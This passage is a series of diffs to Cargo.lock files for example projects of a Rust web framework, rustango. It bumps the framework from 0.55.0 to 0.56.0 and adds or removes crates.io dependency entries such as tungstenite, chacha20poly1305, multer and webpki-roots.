-dependencies = [
- "axum",
- "chrono",
- "dotenvy",
- "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
 ]
 
 [[package]]
@@ -2464,6 +2590,18 @@ dependencies = [
 ]
 
 [[package]]
+name = "tokio-tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f72a05e828585856dacd553fba484c242c46e391fb0e58917c942ee9202915c"
+dependencies = [
+ "futures-util",
+ "log",
+ "tokio",
+ "tungstenite",
+]
+
+[[package]]
 name = "toml"
 version = "0.8.23"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2653,6 +2791,22 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
 
 [[package]]
+name = "tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6c01152af293afb9c7c2a57e4b559c5620b421f6d133261c60dd2d0cdb38e6b8"
+dependencies = [
+ "bytes",
+ "data-encoding",
+ "http",
+ "httparse",
+ "log",
+ "rand 0.9.5",
+ "sha1",
+ "thiserror 2.0.20",
+]
+
+[[package]]
 name = "typenum"
 version = "1.20.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2714,6 +2868,12 @@ dependencies = [
  "percent-encoding",
  "serde",
 ]
+
+[[package]]
+name = "urlencoding"
+version = "2.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "daf8dba3b7eb870caf1ddeed7bc9d2a049f3cfdfae7cb521b087cc33ae4c49da"
 
 [[package]]
 name = "utf8_iter"

--- a/crates/rustango/examples/cookbook_blog/Cargo.lock
+++ b/crates/rustango/examples/cookbook_blog/Cargo.lock
@@ -909,7 +909,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "tower-service",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1772,7 +1772,7 @@ dependencies = [
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1849,7 +1849,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-trait",
@@ -1891,7 +1891,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
@@ -2188,6 +2188,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -2198,6 +2199,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -3025,6 +3027,15 @@ checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]

--- a/crates/rustango/examples/getting_started_blog/Cargo.lock
+++ b/crates/rustango/examples/getting_started_blog/Cargo.lock
@@ -2523,9 +2523,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/getting_started_blog/Cargo.lock
+++ b/crates/rustango/examples/getting_started_blog/Cargo.lock
@@ -892,7 +892,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "tower-service",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1766,7 +1766,7 @@ dependencies = [
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1843,7 +1843,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-trait",
@@ -1886,7 +1886,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
@@ -2183,6 +2183,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -2193,6 +2194,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -3044,6 +3046,15 @@ checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]

--- a/crates/rustango/examples/getting_started_blog/Cargo.lock
+++ b/crates/rustango/examples/getting_started_blog/Cargo.lock
@@ -9,6 +9,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
 
 [[package]]
+name = "aead"
+version = "0.5.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d122413f284cf2d62fb1b7db97e02edb8cda96d769b16e443a4f6195e35662b0"
+dependencies = [
+ "crypto-common",
+ "generic-array",
+]
+
+[[package]]
 name = "aho-corasick"
 version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -89,6 +99,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "31b698c5f9a010f6573133b09e0de5408834d0c82f8d7475a89fc1867a71cd90"
 dependencies = [
  "axum-core",
+ "base64",
  "bytes",
  "form_urlencoded",
  "futures-util",
@@ -101,14 +112,17 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
  "serde_json",
  "serde_path_to_error",
  "serde_urlencoded",
+ "sha1",
  "sync_wrapper",
  "tokio",
+ "tokio-tungstenite",
  "tower",
  "tower-layer",
  "tower-service",
@@ -247,6 +261,17 @@ checksum = "f079e83a288787bcd14a6aea84cee5c87a67c5a3e660c30f557a3d24761b3527"
 
 [[package]]
 name = "chacha20"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3613f74bd2eac03dad61bd53dbe620703d4371614fe0bc3b9f04dd36fe4e818"
+dependencies = [
+ "cfg-if",
+ "cipher",
+ "cpufeatures 0.2.17",
+]
+
+[[package]]
+name = "chacha20"
 version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "65c35e4b699c7e15ccbe7ee35c005e4fc0a278d22238a2857e6ce2dadeda1b06"
@@ -254,6 +279,19 @@ dependencies = [
  "cfg-if",
  "cpufeatures 0.3.1",
  "rand_core 0.10.1",
+]
+
+[[package]]
+name = "chacha20poly1305"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "10cd79432192d1c0f4e1a0fef9527696cc039165d729fb41b3f4f4f354c2dc35"
+dependencies = [
+ "aead",
+ "chacha20 0.9.1",
+ "cipher",
+ "poly1305",
+ "zeroize",
 ]
 
 [[package]]
@@ -266,6 +304,17 @@ dependencies = [
  "num-traits",
  "serde",
  "windows-link",
+]
+
+[[package]]
+name = "cipher"
+version = "0.4.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad"
+dependencies = [
+ "crypto-common",
+ "inout",
+ "zeroize",
 ]
 
 [[package]]
@@ -382,8 +431,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a"
 dependencies = [
  "generic-array",
+ "rand_core 0.6.4",
  "typenum",
 ]
+
+[[package]]
+name = "data-encoding"
+version = "2.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4583a4551df46e2792f82ceeac45e850d2e2d5debba0b91f102385cda5b11f06"
 
 [[package]]
 name = "der"
@@ -441,6 +497,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "252afb9ae5eaa683babdc6a068b3f5726eb19e05070c731f9b2a23a7c3e8ed34"
 dependencies = [
  "serde",
+]
+
+[[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
 ]
 
 [[package]]
@@ -641,6 +706,22 @@ dependencies = [
  "r-efi 6.0.0",
  "rand_core 0.10.1",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "getting_started_blog"
+version = "0.1.0"
+dependencies = [
+ "axum",
+ "chrono",
+ "dotenvy",
+ "rustango",
+ "serde",
+ "serde_json",
+ "tokio",
+ "tower",
+ "tracing",
+ "tracing-subscriber",
 ]
 
 [[package]]
@@ -994,6 +1075,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "inout"
+version = "0.1.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "879f10e63c20629ecabbb64a8010319738c66a5cd0c29b02d63d272b03751d01"
+dependencies = [
+ "generic-array",
+]
+
+[[package]]
 name = "inventory"
 version = "0.3.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1155,6 +1245,32 @@ dependencies = [
 ]
 
 [[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
+]
+
+[[package]]
+name = "nu-ansi-term"
+version = "0.50.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5"
+dependencies = [
+ "windows-sys 0.61.2",
+]
+
+[[package]]
 name = "num-bigint-dig"
 version = "0.8.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1210,6 +1326,12 @@ name = "once_cell"
 version = "1.21.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50"
+
+[[package]]
+name = "opaque-debug"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c08d65885ee38876c4f86fa503fb49d7b507c2b62552df7c70b2fce627e06381"
 
 [[package]]
 name = "parking"
@@ -1346,6 +1468,17 @@ name = "plain"
 version = "0.2.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b4596b6d070b27117e987119b4dac604f3c58cfb0b191112e24771b2faeac1a6"
+
+[[package]]
+name = "poly1305"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8159bd90725d2df49889a078b54f4f79e87f1f8a8444194cdca81d38f5393abf"
+dependencies = [
+ "cpufeatures 0.2.17",
+ "opaque-debug",
+ "universal-hash",
+]
 
 [[package]]
 name = "potential_utf"
@@ -1493,7 +1626,7 @@ version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c7f5fa3a058cd35567ef9bfa5e75732bee0f9e4c55fa90477bef2dfcdbc4be80"
 dependencies = [
- "chacha20",
+ "chacha20 0.10.2",
  "getrandom 0.4.3",
  "rand_core 0.10.1",
 ]
@@ -1716,6 +1849,7 @@ dependencies = [
  "async-trait",
  "axum",
  "base64",
+ "chacha20poly1305",
  "chrono",
  "cookie",
  "flate2",
@@ -1733,6 +1867,7 @@ dependencies = [
  "serde",
  "serde_json",
  "serde_urlencoded",
+ "sha1",
  "sha2",
  "sqlx",
  "subtle",
@@ -1745,6 +1880,7 @@ dependencies = [
  "tracing",
  "tracing-appender",
  "tracing-subscriber",
+ "urlencoding",
  "uuid",
 ]
 
@@ -1757,21 +1893,6 @@ dependencies = [
  "quote",
  "serde_json",
  "syn 2.0.119",
-]
-
-[[package]]
-name = "rustango-showcase"
-version = "0.0.0"
-dependencies = [
- "axum",
- "chrono",
- "dotenvy",
- "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
 ]
 
 [[package]]
@@ -2464,6 +2585,18 @@ dependencies = [
 ]
 
 [[package]]
+name = "tokio-tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f72a05e828585856dacd553fba484c242c46e391fb0e58917c942ee9202915c"
+dependencies = [
+ "futures-util",
+ "log",
+ "tokio",
+ "tungstenite",
+]
+
+[[package]]
 name = "toml"
 version = "0.8.23"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2619,6 +2752,17 @@ dependencies = [
 ]
 
 [[package]]
+name = "tracing-log"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee855f1f400bd0e5c02d150ae5de3840039a3f54b025156404e34c23c03f47c3"
+dependencies = [
+ "log",
+ "once_cell",
+ "tracing-core",
+]
+
+[[package]]
 name = "tracing-serde"
 version = "0.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2635,14 +2779,17 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "cb7f578e5945fb242538965c2d0b04418d38ec25c79d160cd279bf0731c8d319"
 dependencies = [
  "matchers",
+ "nu-ansi-term",
  "once_cell",
  "regex-automata",
  "serde",
  "serde_json",
  "sharded-slab",
+ "smallvec",
  "thread_local",
  "tracing",
  "tracing-core",
+ "tracing-log",
  "tracing-serde",
 ]
 
@@ -2651,6 +2798,22 @@ name = "try-lock"
 version = "0.2.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
+
+[[package]]
+name = "tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6c01152af293afb9c7c2a57e4b559c5620b421f6d133261c60dd2d0cdb38e6b8"
+dependencies = [
+ "bytes",
+ "data-encoding",
+ "http",
+ "httparse",
+ "log",
+ "rand 0.9.5",
+ "sha1",
+ "thiserror 2.0.20",
+]
 
 [[package]]
 name = "typenum"
@@ -2698,6 +2861,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c6f5d3c3b1bf09027a88a6bc961fc00497d651009560b5463668dc81b0fa87a8"
 
 [[package]]
+name = "universal-hash"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc1de2c688dc15305988b563c3854064043356019f97a4b46276fe734c4f07ea"
+dependencies = [
+ "crypto-common",
+ "subtle",
+]
+
+[[package]]
 name = "untrusted"
 version = "0.9.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2714,6 +2887,12 @@ dependencies = [
  "percent-encoding",
  "serde",
 ]
+
+[[package]]
+name = "urlencoding"
+version = "2.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "daf8dba3b7eb870caf1ddeed7bc9d2a049f3cfdfae7cb521b087cc33ae4c49da"
 
 [[package]]
 name = "utf8_iter"

--- a/crates/rustango/examples/mcp_demo/Cargo.lock
+++ b/crates/rustango/examples/mcp_demo/Cargo.lock
@@ -3,12 +3,6 @@
 version = 4
 
 [[package]]
-name = "adler2"
-version = "2.0.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
-
-[[package]]
 name = "aho-corasick"
 version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -40,7 +34,7 @@ checksum = "3c3610892ee6e0cbce8ae2700349fcf8f98adb0dbfbee85aec3c9179d29cc072"
 dependencies = [
  "base64ct",
  "blake2",
- "cpufeatures 0.2.17",
+ "cpufeatures",
  "password-hash",
 ]
 
@@ -49,6 +43,28 @@ name = "arrayvec"
 version = "0.7.8"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d3fb67a6e08acf24fdeccbac2cb6ac4305825bd1f117462e0e6f2f193345ad56"
+
+[[package]]
+name = "async-stream"
+version = "0.3.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0b5a71a6f37880a80d1d7f19efd781e4b5de42c88f0722cc13bcb6cc2cfe8476"
+dependencies = [
+ "async-stream-impl",
+ "futures-core",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "async-stream-impl"
+version = "0.3.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c7c24de15d275a1ecfd47a380fb4d5ec9bfe0933f309ed5e705b775596a3574d"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.119",
+]
 
 [[package]]
 name = "async-trait"
@@ -101,6 +117,7 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
@@ -246,17 +263,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f079e83a288787bcd14a6aea84cee5c87a67c5a3e660c30f557a3d24761b3527"
 
 [[package]]
-name = "chacha20"
-version = "0.10.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "65c35e4b699c7e15ccbe7ee35c005e4fc0a278d22238a2857e6ce2dadeda1b06"
-dependencies = [
- "cfg-if",
- "cpufeatures 0.3.1",
- "rand_core 0.10.1",
-]
-
-[[package]]
 name = "chrono"
 version = "0.4.45"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -300,15 +306,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "cpufeatures"
-version = "0.3.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5ca28b0ae3115b884660db4118d803791fd6756b6e88f39c0f3f7859060d7566"
-dependencies = [
- "libc",
-]
-
-[[package]]
 name = "crc"
 version = "3.4.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -322,15 +319,6 @@ name = "crc-catalog"
 version = "2.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "217698eaf96b4a3f0bc4f3662aaa55bdf913cd54d7204591faa790070c6d0853"
-
-[[package]]
-name = "crc32fast"
-version = "1.5.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8498c871161e1742aaa9d52551b2d6ebdd4c3d45a3be423e3728f33b955be550"
-dependencies = [
- "cfg-if",
-]
 
 [[package]]
 name = "crossbeam-channel"
@@ -444,6 +432,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
+]
+
+[[package]]
 name = "equivalent"
 version = "1.0.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -485,17 +482,6 @@ name = "find-msvc-tools"
 version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d45db016d36b838f563236e9193d0ee6ce38f3f68b6c94e914b4929c96bbb890"
-
-[[package]]
-name = "flate2"
-version = "1.1.10"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6e634e2e0ebac1ee034020da1ca582e17ffe4e0f5e985823721e168928136dcb"
-dependencies = [
- "crc32fast",
- "miniz_oxide",
- "zlib-rs",
-]
 
 [[package]]
 name = "flume"
@@ -611,10 +597,8 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0"
 dependencies = [
  "cfg-if",
- "js-sys",
  "libc",
  "wasi",
- "wasm-bindgen",
 ]
 
 [[package]]
@@ -636,11 +620,8 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "300e883d756b2e4ec94e02791f39b04b522276138852cfc41d9fb7e904106099"
 dependencies = [
  "cfg-if",
- "js-sys",
  "libc",
  "r-efi 6.0.0",
- "rand_core 0.10.1",
- "wasm-bindgen",
 ]
 
 [[package]]
@@ -795,23 +776,6 @@ dependencies = [
  "pin-project-lite",
  "smallvec",
  "tokio",
- "want",
-]
-
-[[package]]
-name = "hyper-rustls"
-version = "0.27.9"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "33ca68d021ef39cf6463ab54c1d0f5daf03377b70561305bb89a8f83aab66e0f"
-dependencies = [
- "http",
- "hyper",
- "hyper-util",
- "rustls",
- "tokio",
- "tokio-rustls",
- "tower-service",
- "webpki-roots",
 ]
 
 [[package]]
@@ -820,21 +784,13 @@ version = "0.1.20"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "96547c2556ec9d12fb1578c4eaf448b04993e7fb79cbaad930a656880a6bdfa0"
 dependencies = [
- "base64",
  "bytes",
- "futures-channel",
- "futures-util",
  "http",
  "http-body",
  "hyper",
- "ipnet",
- "libc",
- "percent-encoding",
  "pin-project-lite",
- "socket2",
  "tokio",
  "tower-service",
- "tracing",
 ]
 
 [[package]]
@@ -1003,12 +959,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "ipnet"
-version = "2.12.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6a756c3fac73139e83f14c2d742155dd2b78d3ee56597b419a0579b7bdd6dd78"
-
-[[package]]
 name = "itoa"
 version = "1.0.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1091,12 +1041,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f9f8bd3e56ce4dfc153cf470fffbfa98c7620958b312ca5c3a4b8d5181fd13c6"
 
 [[package]]
-name = "lru-slab"
-version = "0.1.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "112b39cec0b298b6c1999fee3e31427f74f676e4cb9879ed1a121b43661a4154"
-
-[[package]]
 name = "matchers"
 version = "0.2.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1110,6 +1054,19 @@ name = "matchit"
 version = "0.8.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "47e1ffaa40ddd1f3ed91f717a33c8c0ee23fff369e3aa8772b9605cc1d22f4c3"
+
+[[package]]
+name = "mcp_demo"
+version = "0.1.0"
+dependencies = [
+ "async-trait",
+ "axum",
+ "chrono",
+ "rustango",
+ "serde",
+ "serde_json",
+ "tokio",
+]
 
 [[package]]
 name = "md-5"
@@ -1134,16 +1091,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a"
 
 [[package]]
-name = "miniz_oxide"
-version = "0.9.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "b63fbc4a50860e98e7b2aa7804ded1db5cbc3aff9193adaff57a6931bf7c4b4c"
-dependencies = [
- "adler2",
- "simd-adler32",
-]
-
-[[package]]
 name = "mio"
 version = "1.2.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1152,6 +1099,23 @@ dependencies = [
  "libc",
  "wasi",
  "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
 ]
 
 [[package]]
@@ -1377,7 +1341,7 @@ version = "3.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e67ba7e9b2b56446f1d419b1d807906278ffa1a658a8a5d8a39dcb1f5a78614f"
 dependencies = [
- "toml_edit 0.25.13+spec-1.1.0",
+ "toml_edit",
 ]
 
 [[package]]
@@ -1387,62 +1351,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "985e7ec9bb745e6ce6535b544d84d6cd6f7ad8bd711c398938ae983b91a766d9"
 dependencies = [
  "unicode-ident",
-]
-
-[[package]]
-name = "quinn"
-version = "0.11.11"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0c1a41e437b6bbd489372cd4971de128e85c855f56c57f283d20ff016cf7c0a8"
-dependencies = [
- "bytes",
- "cfg_aliases",
- "pin-project-lite",
- "quinn-proto",
- "quinn-udp",
- "rustc-hash",
- "rustls",
- "socket2",
- "thiserror 2.0.20",
- "tokio",
- "tracing",
- "web-time",
-]
-
-[[package]]
-name = "quinn-proto"
-version = "0.11.17"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "04759210543be93709136e28212294a659ef5001836ff4eab4d663e4529bba83"
-dependencies = [
- "bytes",
- "getrandom 0.4.3",
- "lru-slab",
- "rand 0.10.2",
- "rand_pcg",
- "ring",
- "rustc-hash",
- "rustls",
- "rustls-pki-types",
- "slab",
- "thiserror 2.0.20",
- "tinyvec",
- "tracing",
- "web-time",
-]
-
-[[package]]
-name = "quinn-udp"
-version = "0.5.15"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "35a133f956daabe89a61a685c2649f13d82d5aa4bd5d12d1277e1072a21c0694"
-dependencies = [
- "cfg_aliases",
- "libc",
- "once_cell",
- "socket2",
- "tracing",
- "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -1488,17 +1396,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "rand"
-version = "0.10.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c7f5fa3a058cd35567ef9bfa5e75732bee0f9e4c55fa90477bef2dfcdbc4be80"
-dependencies = [
- "chacha20",
- "getrandom 0.4.3",
- "rand_core 0.10.1",
-]
-
-[[package]]
 name = "rand_chacha"
 version = "0.3.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1534,21 +1431,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "76afc826de14238e6e8c374ddcc1fa19e374fd8dd986b0d2af0d02377261d83c"
 dependencies = [
  "getrandom 0.3.4",
-]
-
-[[package]]
-name = "rand_core"
-version = "0.10.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "63b8176103e19a2643978565ca18b50549f6101881c443590420e4dc998a3c69"
-
-[[package]]
-name = "rand_pcg"
-version = "0.10.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "caa0f4137e1c0a72f4c651489402276c8e8e1cf081f3b0ba156d2cbeef09e86a"
-dependencies = [
- "rand_core 0.10.1",
 ]
 
 [[package]]
@@ -1597,58 +1479,6 @@ name = "regex-syntax"
 version = "0.8.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d6f6ff9a378485b298a5286656da665ba74413d36db0979633275d2e708145d4"
-
-[[package]]
-name = "reqwest"
-version = "0.12.28"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "eddd3ca559203180a307f12d114c268abf583f59b03cb906fd0b3ff8646c1147"
-dependencies = [
- "base64",
- "bytes",
- "futures-core",
- "http",
- "http-body",
- "http-body-util",
- "hyper",
- "hyper-rustls",
- "hyper-util",
- "js-sys",
- "log",
- "percent-encoding",
- "pin-project-lite",
- "quinn",
- "rustls",
- "rustls-pki-types",
- "serde",
- "serde_json",
- "serde_urlencoded",
- "sync_wrapper",
- "tokio",
- "tokio-rustls",
- "tower",
- "tower-http",
- "tower-service",
- "url",
- "wasm-bindgen",
- "wasm-bindgen-futures",
- "web-sys",
- "webpki-roots",
-]
-
-[[package]]
-name = "ring"
-version = "0.17.14"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a4689e6c2294d81e88dc6261c768b63bc4fcdb852be6d1352498b114f61383b7"
-dependencies = [
- "cc",
- "cfg-if",
- "getrandom 0.2.17",
- "libc",
- "untrusted",
- "windows-sys 0.52.0",
-]
 
 [[package]]
 name = "rpassword"
@@ -1713,12 +1543,12 @@ name = "rustango"
 version = "0.55.0"
 dependencies = [
  "argon2",
+ "async-stream",
  "async-trait",
  "axum",
  "base64",
  "chrono",
  "cookie",
- "flate2",
  "hmac",
  "http",
  "http-body-util",
@@ -1726,7 +1556,6 @@ dependencies = [
  "inventory",
  "password-hash",
  "rand 0.8.8",
- "reqwest",
  "rpassword",
  "rust_decimal",
  "rustango-macros",
@@ -1740,7 +1569,6 @@ dependencies = [
  "thiserror 1.0.69",
  "time",
  "tokio",
- "toml",
  "tower",
  "tracing",
  "tracing-appender",
@@ -1757,62 +1585,6 @@ dependencies = [
  "quote",
  "serde_json",
  "syn 2.0.119",
-]
-
-[[package]]
-name = "rustango-showcase"
-version = "0.0.0"
-dependencies = [
- "axum",
- "chrono",
- "dotenvy",
